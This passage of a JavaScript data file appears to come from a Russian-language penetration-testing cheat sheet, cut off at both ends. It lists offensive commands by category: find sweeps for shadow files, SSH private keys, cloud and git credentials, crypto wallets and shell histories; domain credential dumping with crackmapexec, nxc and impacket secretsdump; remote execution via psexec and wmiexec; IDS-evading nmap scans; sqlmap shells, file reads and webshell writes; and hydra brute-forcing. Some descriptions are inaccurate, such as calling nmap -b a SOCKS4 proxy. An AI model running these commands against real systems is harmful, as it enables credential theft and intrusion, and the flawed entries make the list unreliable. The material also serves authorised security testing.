      { cmd: "find / -name 'shadow' 2>/dev/null", desc: "Файлы shadow." },
      { cmd: "find / -name 'sudoers' 2>/dev/null", desc: "Файлы sudoers." },
      { cmd: "find / -name '*.key' 2>/dev/null", desc: "Ключевые файлы." },
      { cmd: "find / -name '*.crt' 2>/dev/null", desc: "Сертификаты." },
      { cmd: "find / -name '*.p12' 2>/dev/null", desc: "PKCS12-хранилища." },
      { cmd: "find / -name 'wp-config.php' 2>/dev/null", desc: "WordPress-конфиг." },
      { cmd: "find / -name 'config.php' 2>/dev/null", desc: "PHP-конфиги." },
      { cmd: "find / -name 'settings.py' 2>/dev/null", desc: "Python-конфиги." },
      { cmd: "find / -name 'application.properties' 2>/dev/null", desc: "Java-конфиги." },
      { cmd: "find / -name 'web.config' 2>/dev/null", desc: ".NET-конфиги." },
      { cmd: "find / -name 'vhosts.conf' 2>/dev/null", desc: "Apache vhosts." },
      { cmd: "find / -name 'nginx.conf' 2>/dev/null", desc: "nginx-конфиги." },
      { cmd: "find / -name 'docker-compose.yml' 2>/dev/null", desc: "Docker compose." },
      { cmd: "find / -name 'Dockerfile' 2>/dev/null", desc: "Dockerfile'ы." },
      { cmd: "find / -name '.git' -type d 2>/dev/null", desc: "Git-репозитории." },
      { cmd: "find / -name '.env.local' 2>/dev/null", desc: "env.local." },
      { cmd: "find / -name '.aws' -type d 2>/dev/null", desc: "AWS-конфиги." },
      { cmd: "find / -name 'credentials' -path '*/.aws/*' 2>/dev/null", desc: "AWS-credentials." },
      { cmd: "find / -name 'token' -path '*/.git/*' 2>/dev/null", desc: "Git-токены." },
      { cmd: "find / -name 'id_ed25519' 2>/dev/null", desc: "Ed25519-ключи." },
      { cmd: "find / -name 'id_rsa' 2>/dev/null", desc: "RSA-ключи." },
      { cmd: "find / -name 'id_ecdsa' 2>/dev/null", desc: "ECDSA-ключи." },
      { cmd: "find / -name 'id_dsa' 2>/dev/null", desc: "DSA-ключи." },
      { cmd: "find / -name '*.asc' 2>/dev/null", desc: "GPG-подписи." },
      { cmd: "find / -name 'pubring.kbx' 2>/dev/null", desc: "GPG-кольцо." },
      { cmd: "find / -name 'secring.gpg' 2>/dev/null", desc: "GPG-секретное кольцо." },
      { cmd: "find / -name 'wallet.dat' 2>/dev/null", desc: "Bitcoin-кошельки." },
      { cmd: "find / -name '*.dat' -path '*wallet*' 2>/dev/null", desc: "Кошельки (*)." },
      { cmd: "find / -name 'shadow' -o -name 'gshadow' 2>/dev/null", desc: "shadow + gshadow." },
      { cmd: "find / -name 'passwd' -o -name 'group' 2>/dev/null", desc: "passwd + group." },
      { cmd: "find / -name 'hosts' -o -name 'resolv.conf' 2>/dev/null", desc: "hosts + resolv." },
      { cmd: "find / -name 'sshd_config' 2>/dev/null", desc: "SSH-конфиги." },
      { cmd: "find / -name 'sudoers.d' -type d 2>/dev/null", desc: "sudoers.d." },
      { cmd: "find / -name 'crontab' 2>/dev/null", desc: "crontab'ы." },
      { cmd: "find / -name '*.cron' 2>/dev/null", desc: "cron-файлы." },
      { cmd: "find / -name 'at.job' 2>/dev/null", desc: "at-задачи." },
      { cmd: "find / -name 'snap' -name '*.snap' 2>/dev/null", desc: "snap-файлы." },
      { cmd: "find / -name 'flatpakref' 2>/dev/null", desc: "flatpakref-файлы." },
      { cmd: "find / -name 'appimage' 2>/dev/null", desc: "AppImage-файлы." },
      { cmd: "find / -name '*.AppImage' 2>/dev/null", desc: "AppImage (*.AppImage)." },
      { cmd: "find / -name 'cache' -name '*.cache' 2>/dev/null", desc: "cache-файлы." },
      { cmd: "find / -name '.cache' -type d 2>/dev/null", desc: ".cache-каталоги." },
      { cmd: "find / -name '.local' -type d 2>/dev/null", desc: ".local-каталоги." },
      { cmd: "find / -name '.config' -type d 2>/dev/null", desc: ".config-каталоги." },
      { cmd: "find / -name '.gnupg' -type d 2>/dev/null", desc: ".gnupg-каталоги." },
      { cmd: "find / -name '.kube' -type d 2>/dev/null", desc: ".kube-каталоги." },
      { cmd: "find / -name '.docker' -type d 2>/dev/null", desc: ".docker-каталоги." },
      { cmd: "find / -name '.npm' -type d 2>/dev/null", desc: ".npm-каталоги." },
      { cmd: "find / -name '.nvm' -type d 2>/dev/null", desc: ".nvm-каталоги." },
      { cmd: "find / -name '.gem' -type d 2>/dev/null", desc: ".gem-каталоги." },
      { cmd: "find / -name '.cargo' -type d 2>/dev/null", desc: ".cargo-каталоги." },
      { cmd: "find / -name '.rustup' -type d 2>/dev/null", desc: ".rustup-каталоги." },
      { cmd: "find / -name '.golang' -type d 2>/dev/null", desc: ".golang-каталоги." },
      { cmd: "find / -name '.vscode' -type d 2>/dev/null", desc: ".vscode-каталоги." },
      { cmd: "find / -name '.vim' -type d 2>/dev/null", desc: ".vim-каталоги." },
      { cmd: "find / -name '.bashrc' 2>/dev/null", desc: ".bashrc-файлы." },
      { cmd: "find / -name '.profile' 2>/dev/null", desc: ".profile-файлы." },
      { cmd: "find / -name '.zshrc' 2>/dev/null", desc: ".zshrc-файлы." },
      { cmd: "find / -name '.bash_history' 2>/dev/null", desc: ".bash_history-файлы." },
      { cmd: "find / -name '.zsh_history' 2>/dev/null", desc: ".zsh_history-файлы." },
      { cmd: "find / -name '.viminfo' 2>/dev/null", desc: ".viminfo-файлы." },
      { cmd: "find / -name '.python_history' 2>/dev/null", desc: ".python_history-файлы." },
      { cmd: "find / -name '.mysql_history' 2>/dev/null", desc: ".mysql_history-файлы." },
      { cmd: "find / -name '.psql_history' 2>/dev/null", desc: ".psql_history-файлы." },
      { cmd: "find / -name '.lesshst' 2>/dev/null", desc: ".lesshst-файлы." },
      { cmd: "find / -name '.screenrc' 2>/dev/null", desc: ".screenrc-файлы." },
      { cmd: "find / -name '.tmux.conf' 2>/dev/null", desc: ".tmux.conf-файлы." },
      { cmd: "find / -name '.gitconfig' 2>/dev/null", desc: ".gitconfig-файлы." },
      { cmd: "find / -name '.git-credentials' 2>/dev/null", desc: ".git-credentials-файлы." },
      { cmd: "find / -name '.netrc' 2>/dev/null", desc: ".netrc-файлы." },
      { cmd: "find / -name '.pgpass' 2>/dev/null", desc: ".pgpass-файлы." },
      { cmd: "find / -name '.my.cnf' 2>/dev/null", desc: ".my.cnf-файлы." },
      { cmd: "find / -name '.pgpass' -o -name '.my.cnf' 2>/dev/null", desc: ".pgpass + .my.cnf." },
      { cmd: "find / -name '.npmrc' 2>/dev/null", desc: ".npmrc-файлы." },
      { cmd: "find / -name '.pypirc' 2>/dev/null", desc: ".pypirc-файлы." },
      { cmd: "find / -name '.dockerconfigjson' 2>/dev/null", desc: ".dockerconfigjson-файлы." },
      { cmd: "find / -name 'config.json' -path '*/.docker/*' 2>/dev/null", desc: "Docker config.json." },
      { cmd: "find / -name 'key.json' -path '*/.aws/*' 2>/dev/null", desc: "AWS key.json." },
      { cmd: "find / -name 'config' -path '*/.kube/*' 2>/dev/null", desc: "Kube config." },
      { cmd: "find / -name 'known_hosts' -path '*/.ssh/*' 2>/dev/null", desc: "SSH known_hosts." },
      { cmd: "find / -name 'authorized_keys' -path '*/.ssh/*' 2>/dev/null", desc: "SSH authorized_keys." },
      { cmd: "find / -name 'config' -path '*/.git/*' 2>/dev/null", desc: "Git config." },
      { cmd: "find / -name 'HEAD' -path '*/.git/*' 2>/dev/null", desc: "Git HEAD." },
      { cmd: "find / -name 'COMMIT_EDITMSG' -path '*/.git/*' 2>/dev/null", desc: "Git COMMIT_EDITMSG." },
      { cmd: "find / -name 'FETCH_HEAD' -path '*/.git/*' 2>/dev/null", desc: "Git FETCH_HEAD." },
      { cmd: "find / -name 'ORIG_HEAD' -path '*/.git/*' 2>/dev/null", desc: "Git ORIG_HEAD." },
      { cmd: "find / -name 'packed-refs' -path '*/.git/*' 2>/dev/null", desc: "Git packed-refs." },
      { cmd: "find / -name 'index' -path '*/.git/*' 2>/dev/null", desc: "Git index." },
      { cmd: "find / -name 'config' -path '*/.config/*' 2>/dev/null", desc: "Config config." },
      { cmd: "find / -name 'settings.ini' -path '*/.config/*' 2>/dev/null", desc: "Config settings.ini." },
      { cmd: "find / -name 'settings.conf' -path '*/.config/*' 2>/dev/null", desc: "Config settings.conf." },
      { cmd: "find / -name 'settings.cfg' -path '*/.config/*' 2>/dev/null", desc: "Config settings.cfg." },
      { cmd: "find / -name 'settings.yaml' -path '*/.config/*' 2>/dev/null", desc: "Config settings.yaml." },
      { cmd: "find / -name 'settings.yml' -path '*/.config/*' 2>/dev/null", desc: "Config settings.yml." },
      { cmd: "find / -name 'settings.toml' -path '*/.config/*' 2>/dev/null", desc: "Config settings.toml." },
      { cmd: "find / -name 'settings.json' -path '*/.config/*' 2>/dev/null", desc: "Config settings.json." },
      { cmd: "find / -name 'settings.xml' -path '*/.config/*' 2>/dev/null", desc: "Config settings.xml." },
      { cmd: "find / -name 'settings.properties' -path '*/.config/*' 2>/dev/null", desc: "Config settings.properties." },
      { cmd: "find / -name 'settings.ini' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.ini." },
      { cmd: "find / -name 'settings.conf' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.conf." },
      { cmd: "find / -name 'settings.cfg' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.cfg." },
      { cmd: "find / -name 'settings.yaml' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.yaml." },
      { cmd: "find / -name 'settings.yml' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.yml." },
      { cmd: "find / -name 'settings.toml' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.toml." },
      { cmd: "find / -name 'settings.json' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.json." },
      { cmd: "find / -name 'settings.xml' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.xml." },
      { cmd: "find / -name 'settings.properties' -path '*/etc/*' 2>/dev/null", desc: "Etc settings.properties." },
    ] },
    { name: "Reconnaissance", entries: [
      { cmd: "nmap -sn 192.168.1.0/24", desc: "Ping sweep: активные хосты без скана портов." },
      { cmd: "nmap -sP 10.0.0.0/24", desc: "Host discovery (устаревший флаг, то же что -sn)." },
      { cmd: "fping -a -g 192.168.1.0/24", desc: "Быстрый список живых хостов." },
      { cmd: "fping -s -g 10.10.0.0/24", desc: "Ping-статистика по сети (RTT, loss)." },
      { cmd: "arping -I eth0 192.168.1.10", desc: "ARP-проверка хоста в сегменте L2." },
      { cmd: "dig example.com A", desc: "A-запись (IPv4)." },
      { cmd: "dig example.com AAAA", desc: "AAAA-запись (IPv6)." },
      { cmd: "dig example.com MX", desc: "MX: почтовые серверы." },
      { cmd: "dig example.com TXT", desc: "TXT (SPF, DKIM, верификации)." },
      { cmd: "dig example.com NS", desc: "NS-серверы домена." },
      { cmd: "dig -t SOA example.com", desc: "SOA: primary, refresh, retry, expire." },
      { cmd: "dig +trace example.com", desc: "Полный путь: root → TLD → домен." },
      { cmd: "dig +short example.com", desc: "Только значения ответов." },
      { cmd: "dig @8.8.8.8 example.com", desc: "Запрос к конкретному резолверу." },
      { cmd: "host -t CNAME example.com", desc: "CNAME-алиасы." },
      { cmd: "host -t A -l example.com", desc: "AXFR зоны (если разрешён — утечка зоны)." },
      { cmd: "nslookup -type=MX example.com 1.1.1.1", desc: "MX через указанный DNS." },
      { cmd: "whois example.com", desc: "Регистратор, даты, abuse-контакты." },
      { cmd: "whois -h whois.ripe.net 192.168.1.1", desc: "IP-блок у конкретного RIR." },
      { cmd: "nbtstat -A 192.168.1.10", desc: "NetBIOS-имена Windows-хоста." },
      { cmd: "enum4linux -a 192.168.1.10", desc: "SMB/NBT: users, groups, shares, policy." },
      { cmd: "enum4linux -u admin -p pass 192.168.1.10", desc: "Авторизованная enum4linux." },
      { cmd: "smbclient -L //192.168.1.10 -N", desc: "Список SMB-шар (анонимно)." },
      { cmd: "smbclient -L //192.168.1.10 -U user%pass", desc: "Список SMB-шар (авторизованно)." },
      { cmd: "smbclient //192.168.1.10/share -U user%pass", desc: "Вход в шар: ls, get, put." },
      { cmd: "smbmap -u user -p pass 192.168.1.10", desc: "smbmap: шары и права доступа." },
      { cmd: "smbmap -u user -p pass --shares 192.168.1.10", desc: "smbmap: детали шар." },
      { cmd: "rpcclient -U user%pass 192.168.1.10", desc: "RPC: enumdomusers, lsa, srvinfo." },
      { cmd: "crackmapexec smb 192.168.1.0/24 -u admin -p pass --shares", desc: "CME: SMB-шары по подсети." },
      { cmd: "crackmapexec smb 192.168.1.0/24 -u admin -p pass --pass-pol", desc: "CME: политика паролей." },
      { cmd: "crackmapexec ldap dc01 -u admin -p pass --users", desc: "CME: LDAP-пользователи." },
      { cmd: "nxc smb 192.168.1.10 -u admin -p pass --sam", desc: "NXC: дамп SAM (NTLM)." },
      { cmd: "nxc smb 192.168.1.10 -u admin -p pass --secrets", desc: "NXC: secrets.dsr (NTDS)." },
      { cmd: "nxc smb 192.168.1.10 -u admin -p pass --local-groups", desc: "NXC: локальные группы." },
      { cmd: "nxc ldap dc01 -u admin -p pass --users", desc: "NXC: LDAP users." },
      { cmd: "ldapsearch -x -H ldap://dc01 -D 'CN=probe,DC=x' -W", desc: "LDAP simple bind." },
      { cmd: "ldapsearch -x -H ldap://dc01 -b 'DC=x' '(objectClass=user)' sAMAccountName mail", desc: "Все AD-пользователи с почтой." },
      { cmd: "ldapsearch -x -H ldap://dc01 -b 'DC=x' '(objectClass=group)' cn", desc: "LDAP-группы." },
      { cmd: "ldapsearch -x -H ldap://dc01 -b 'DC=x' '(objectClass=computer)' dNSHostName", desc: "Компьютеры домена." },
      { cmd: "ldapdomaindump -u user -p pass -o out.json dc01", desc: "LDAP-дамп домена в JSON." },
      { cmd: "impacket-secretsdump dc01 user%pass", desc: "Impacket: NTDS.dit remote (DS-Replication)." },
      { cmd: "impacket-secretsdump dc01 user%pass -just-dc", desc: "Только DC (NTDS)." },
      { cmd: "impacket-getTGT dc01/user@DOMAIN -dc-ip 10.0.0.1", desc: "TGT по логину/паролю." },
      { cmd: "impacket-psexec dc01 user%pass cmd.exe", desc: "PsExec удалённый процесс." },
      { cmd: "impacket-wmiexec dc01 user%pass whoami", desc: "WMI-исполнение (без бинарника)." },
      { cmd: "impacket-smbexec dc01 user%pass whoami", desc: "SMB-исполнение (интерактив)." },
      { cmd: "impacket-at dc01 user%pass whoami", desc: "Исполнение через task scheduler." },
      { cmd: "impacket-ldapsearch dc01 user%pass -F", desc: "Impacket: LDAP-энаумерация." },
      { cmd: "impacket-rpcdump dc01 user%pass", desc: "Impacket: RPC-дамп пользователей." },
      { cmd: "impacket-smbclient //192.168.1.10/share -U user%pass", desc: "Impacket: SMB-клиент (get/put)." },
      { cmd: "impacket-laps dc01 user%pass", desc: "Impacket: чтение LAPS-паролей." },
      { cmd: "adfind -f '(serviceprincipalname=*)' -all", desc: "adfind: все SPN (Kerberoasting)." },
      { cmd: "adfind -f '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)'", desc: "Объекты с уязвимостью RBCD." },
      { cmd: "whatweb example.com", desc: "Веб-стек: server, CMS, framework." },
      { cmd: "whatweb -a 3 example.com", desc: "Глубина 3 (более агрессивный анализ)." },
      { cmd: "wpscan --url http://target --enumerate ap,u,m", desc: "WordPress: плагины, пользователи, посты." },
      { cmd: "joomscan -u http://target", desc: "Joomla: версия, компоненты." },
      { cmd: "nikto -h http://target", desc: "Веб-сканер: уязвимости, устаревшее ПО." },
      { cmd: "dnsrecon -d example.com", desc: "DNS: субдомены, NS, MX, SOA." },
      { cmd: "dnsrecon -d example.com -t brt", desc: "DNS brute (wordlist)." },
      { cmd: "dnsmap example.com", desc: "DNS-маппинг + whois-контекст." },
      { cmd: "dnstracer example.com", desc: "Трейс DNS-цепочки до делегирования." },
      { cmd: "theHarvester example.com", desc: "Email/субдомены/хосты из публичных источников." },
      { cmd: "metagoofil -d example.com", desc: "Документы (PDF/DOC/XLS) по домену + метаданные." },
      { cmd: "subfinder -d example.com", desc: "Пассивная/активная субдомен-энаумерация." },
      { cmd: "amass enum -d example.com", desc: "Комбинированная DNS-разведка." },
      { cmd: "amass passive -d example.com", desc: "Только пассивные источники." },
      { cmd: "recon-ng", desc: "Интерактивный recon-фреймворк." },
      { cmd: "social-analyzer example.com", desc: "OSINT по соцсетям." },
      { cmd: "sn0int example.com", desc: "Мультиисточниковый OSINT." },
    ] },
    { name: "Scanning (nmap)", entries: [
      { cmd: "nmap -sS", desc: "SYN scan (half-open) — быстрый, не полный handshake." },
      { cmd: "nmap -sT", desc: "TCP connect scan — когда SYN недоступен (не root)." },
      { cmd: "nmap -sW", desc: "Window scan (без root)." },
      { cmd: "nmap -sA", desc: "ACK scan: контуры firewall/IPS." },
      { cmd: "nmap -sU", desc: "UDP-скан (медленный, но нужен для DNS/SNMP/TFTP)." },
      { cmd: "nmap -sV", desc: "Версии сервисов (banner, пробы)." },
      { cmd: "nmap -sC", desc: "Запуск стандартных NSE-скриптов." },
      { cmd: "nmap -O", desc: "Определение ОС по TCP/IP fingerprint." },
      { cmd: "nmap -A", desc: "Aggressive: -sV -O --script --traceroute." },
      { cmd: "nmap -Pn", desc: "Не слать ping: сканировать даже «мёртвые» хосты." },
      { cmd: "nmap -T0", desc: "Паранойя: минимальная скорость ( IDS)." },
      { cmd: "nmap -T1", desc: "Заговорщический: очень медленно." },
      { cmd: "nmap -T2", desc: "Тихий: задержка 100 мс." },
      { cmd: "nmap -T3", desc: "Нормальный (по умолчанию)." },
      { cmd: "nmap -T4", desc: "Быстрый: задержка 50 мс — оптимум для локалки." },
      { cmd: "nmap -T5", desc: "Бешеный: задержка 10 мс — высокий риск потерь." },
      { cmd: "nmap --min-rate 1000", desc: "Минимум 1000 пакетов/сек." },
      { cmd: "nmap --max-retries 2", desc: "Лимит повторов на пакет." },
      { cmd: "nmap --source-port 53", desc: "Шлём с порта 53 (обход простых FW)." },
      { cmd: "nmap --reason", desc: "Показывать причину каждого вывода." },
      { cmd: "nmap -f", desc: "Фрагментация пакетов (обход простых IDS)." },
      { cmd: "nmap --mtu 8", desc: "Свой MTU для фрагментации." },
      { cmd: "nmap -e eth0", desc: "Выбор интерфейса." },
      { cmd: "nmap -iL hosts.txt", desc: "Список целей из файла." },
      { cmd: "nmap -oA fullscan", desc: "Результат в .nmap + .xml + .gnmap." },
      { cmd: "nmap -oN scan.txt", desc: "Обычный текстовый отчёт." },
      { cmd: "nmap -oX scan.xml", desc: "XML (для XSLT/парсинга)." },
      { cmd: "nmap --script vuln", desc: "NSE: категория vuln." },
      { cmd: "nmap --script safe", desc: "NSE: безопасные скрипты." },
      { cmd: "nmap --script default", desc: "Категория default (как -sC)." },
      { cmd: "nmap --script intrusive", desc: "Глубокие скрипты (может ронать сервисы)." },
      { cmd: "nmap --script-args vuln=...", desc: "Аргументы для NSE." },
      { cmd: "nmap --version-intensity 5", desc: "Глубина определения версий (0–9)." },
      { cmd: "nmap --version-light", desc: "Лёгкое определение версий." },
      { cmd: "nmap --version-all", desc: "Максимальное определение версий." },
      { cmd: "nmap --osscan-guess", desc: "Угадывать ОС при неполном фангпринте." },
      { cmd: "nmap --dns-all", desc: "Все DNS-записи (A, AAAA, CNAME, PTR, TXT)." },
      { cmd: "nmap --dns-servers 8.8.8.8", desc: "Свой DNS для PTR/имён." },
      { cmd: "nmap --data-length 16", desc: "Наполнить пакет 16 случайных байт (обход IDS)." },
      { cmd: "nmap -n", desc: "Не делать обратного DNS." },
      { cmd: "nmap -6", desc: "IPv6-сканирование." },
      { cmd: "nmap --open", desc: "Показывать только открытые порты." },
      { cmd: "nmap --packet-trace", desc: "Показывать каждый отправленный/полученный пакет." },
      { cmd: "nmap --iflist", desc: "Список интерфейсов nmap." },
      { cmd: "nmap --exclude 192.168.1.1", desc: "Исключить хост из скана." },
      { cmd: "nmap --host-timeout 30m", desc: "Пропустить хост после 30 минут." },
      { cmd: "nmap --max-parallelism 100", desc: "Лимит параллельных пробок." },
      { cmd: "nmap --scan-delay 10s", desc: "Пауза между хостами." },
      { cmd: "nmap --append-output scan.txt", desc: "Дописать в существующий отчёт." },
      { cmd: "nmap -v", desc: "Подробный вывод." },
      { cmd: "nmap -vv", desc: "Очень подробный вывод." },
      { cmd: "nmap -d", desc: "Debug (уровень 1)." },
      { cmd: "nmap --stats-every 10m", desc: "Промежуточная статистика каждые 10 минут." },
      { cmd: "nmap -sI zombie", desc: "Zombie scan (NULL window) через хост-зомби." },
      { cmd: "nmap --ipprotosweep", desc: "Сканирование IP-протоколов." },
      { cmd: "nmap -b 192.168.1.2", desc: "Прокси через SOCKS4." },
      { cmd: "nmap -sS -sV -T4 192.168.1.10", desc: "Классический SYN + версии." },
      { cmd: "nmap -sU --top-ports 20 192.168.1.10", desc: "UDP top-20." },
      { cmd: "nmap -p- 192.168.1.10", desc: "Все 65535 TCP-портов." },
      { cmd: "nmap -p 1-1024 192.168.1.10", desc: "Системные порты." },
    ] },
    { name: "Web attacks", entries: [
      { cmd: "sqlmap -u 'http://t/p?id=1' --batch", desc: "Авто-режим (без вопросов)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dbs", desc: "Список баз данных." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --tables -D db", desc: "Таблицы базы db." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --columns -D db -t users", desc: "Колонки таблицы users." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dump -D db -t users", desc: "Дамп таблицы users." },
      { cmd: "sqlmap -u 'http://t/' --cookie='PHPSESSID=abc'", desc: "SQLi через cookie." },
      { cmd: "sqlmap -u 'http://t/' --data='user=x&pass=y'", desc: "POST-данные." },
      { cmd: "sqlmap -u 'http://t/p' --headers='X-Forwarded-For: 1.2.3.4'", desc: "SQLi в HTTP-заголовке." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --tamper=between,space2comment", desc: "Обход WAF (tamper-скрипты)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --level=5 --risk=3", desc: "Глубокий анализ (все параметры)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --os-shell", desc: "Shell (если RCE)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --os-cmd='whoami'", desc: "Одна команда на цели." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --os-pwn", desc: "Shell (авто-выбор метода)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --file-read=/etc/passwd", desc: "Чтение файла с цели." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --file-write=x.php --file-dest=/var/www/x.php", desc: "Запись файла на цель." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --technique=BEUSTQ", desc: "Только конкретные техники." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dbms=mysql", desc: "Указать СУБД вручную." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --current-user", desc: "Пользователь БД." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --current-db", desc: "Текущая база." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --is-dbn", desc: "Детект: да/нет." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --identify-waf", desc: "Определить WAF." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --time-sec=5", desc: "Слепой SQLi: тайминг 5 сек." },
      { cmd: "sqlmap -u 'http://t/' --forms", desc: "SQLi во всех формах." },
      { cmd: "sqlmap -u 'http://t/' --crawl=3", desc: "SQLi по всему сайту." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --random-agent", desc: "Случайный User-Agent." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --delay=2", desc: "Пауза 2 сек." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --threads=4", desc: "4 потока." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --proxy='http://127.0.0.1:8080'", desc: "Через прокси (Burp)." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --prefix='(' --suffix=')'", desc: "Обёртка для инъекта." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --union-cols=3", desc: "UNION: 3 колонки." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dump-format=csv", desc: "Дамп в CSV." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --dump-id=5", desc: "Дамп записи id=5." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --purge-output", desc: "Удалить старые отчёты." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --output-dir=/tmp/sq", desc: "Каталог отчётов." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --retries=10", desc: "Повторы запроса." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --timeout=15", desc: "Таймаут 15 сек." },
      { cmd: "sqlmap -u 'http://t/p?id=1' --flush-session", desc: "Сброс сессии." },
      { cmd: "gobuster dir -u http://t -w /usr/share/wordlists/dirb/common.txt", desc: "Поиск каталогов (GET)." },
      { cmd: "gobuster dir -u http://t -w /usr/share/wordlists/dirb/common.txt -x php,html,txt", desc: "С расширениями." },
      { cmd: "gobuster vhost -u http://t -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-10000.txt", desc: "VHost-энаумерация." },
      { cmd: "gobuster dns -d example.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-10000.txt", desc: "DNS-брут (gobuster)." },
      { cmd: "gobuster fuzz -u http://t/FUZZ -w rockyou.txt", desc: "Фаззинг произвольного URL." },
      { cmd: "gobuster fuzz -u http://t -X POST -d 'user=FUZZ' -w users.txt", desc: "Фаззинг POST-параметра." },
      { cmd: "dirb http://t /usr/share/wordlists/dirb/common.txt", desc: "Классический dirb." },
      { cmd: "dirb http://t /usr/share/wordlists/dirb/big.txt", desc: "Крупный wordlist." },
      { cmd: "dirb http://t /usr/share/wordlists/dirb/common.txt php", desc: "С расширением php." },
      { cmd: "dirsearch -u http://t", desc: "dirsearch: каталоги + файлы." },
      { cmd: "dirsearch -u http://t -e php,asp,jsp", desc: "С расширениями." },
      { cmd: "dirsearch -u http://t -e js,php --full-url", desc: "Полные URL в выводе." },
      { cmd: "ffuf -u http://t/FUZZ -w /usr/share/wordlists/rockyou.txt", desc: "ffuf: фаззер (быстрый)." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -e php,html", desc: "С расширениями." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -mc 200,301,403", desc: "Фильтр по кодам." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -fc 404", desc: "Скрыть 404." },
      { cmd: "ffuf -u http://t -X POST -d 'user=FUZZ&pass=x' -w rockyou.txt", desc: "POST-фаззинг." },
      { cmd: "ffuf -u http://t -H 'X-Api-Key: FUZZ' -w rockyou.txt", desc: "Фаззинг заголовка." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -ma 100", desc: "Лимит длины ответа." },
      { cmd: "ffuf -u http://t/FUZZ -w rockyou.txt -mc 200 -fw 1234", desc: "Фильтр по слову/длинне." },
      { cmd: "wfuzz -w /usr/share/wordlists/dirb/common.txt http://t/", desc: "wfuzz: каталоги." },
      { cmd: "wfuzz -w rockyou.txt http://t/p?user=word", desc: "wfuzz: параметр." },
      { cmd: "wfuzz -c -w rockyou.txt --hw=34 http://t/p?user=word", desc: "Без цвета, фильтр длины." },
      { cmd: "nikto -h http://t", desc: "Веб-сканер (уязвимости)." },
      { cmd: "nikto -h http://t -port 8080", desc: "Другой порт." },
      { cmd: "nikto -h http://t -ssl", desc: "HTTPS." },
      { cmd: "nikto -h http://t -Tuning \"x678\"", desc: "Выбор проверок." },
      { cmd: "nikto -h http://t -C all", desc: "Все категории." },
      { cmd: "wpscan --url http://t --enumerate ap", desc: "WordPress: плагины." },
      { cmd: "wpscan --url http://t --enumerate u", desc: "WordPress: пользователи." },
      { cmd: "wpscan --url http://t --enumerate vp", desc: "Устаревшие плагины." },
      { cmd: "wpscan --url http://t --api-token TOKEN", desc: "Всё с API-токеном." },
      { cmd: "wpscan --url http://t --wp-content-dir 'wp-content'", desc: "Нестандартный wp-content." },
    ] },
    { name: "Password (hydra)", entries: [
      { cmd: "hydra -L users.txt -P rockyou.txt ssh://target", desc: "hydra: SSH" },
      { cmd: "hydra -L users.txt -P rockyou.txt ftp://target", desc: "hydra: FTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt ftpes://target", desc: "hydra: FTPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt sftp://target", desc: "hydra: SFTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt telnet://target", desc: "hydra: Telnet" },
      { cmd: "hydra -L users.txt -P rockyou.txt telnet-ssl://target", desc: "hydra: Telnet over TLS" },
      { cmd: "hydra -L users.txt -P rockyou.txt rlogin://target", desc: "hydra: rlogin" },
      { cmd: "hydra -L users.txt -P rockyou.txt rsh://target", desc: "hydra: rsh" },
      { cmd: "hydra -L users.txt -P rockyou.txt smtp://target", desc: "hydra: SMTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt smtps://target", desc: "hydra: SMTPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt smtp-user://target", desc: "hydra: SMTP (логин в EHLO)" },
      { cmd: "hydra -L users.txt -P rockyou.txt pop3://target", desc: "hydra: POP3" },
      { cmd: "hydra -L users.txt -P rockyou.txt pop3s://target", desc: "hydra: POP3S" },
      { cmd: "hydra -L users.txt -P rockyou.txt imap://target", desc: "hydra: IMAP" },
      { cmd: "hydra -L users.txt -P rockyou.txt imaps://target", desc: "hydra: IMAPS" },
      { cmd: "hydra -L users.txt -P rockyou.txt nnntp://target", desc: "hydra: NNTP" },
      { cmd: "hydra -L users.txt -P rockyou.txt vnc://target", desc: "hydra: VNC" },
      { cmd: "hydra -L users.txt -P rockyou.txt pcanywhere://target", desc: "hydra: PC-Anywhere" },
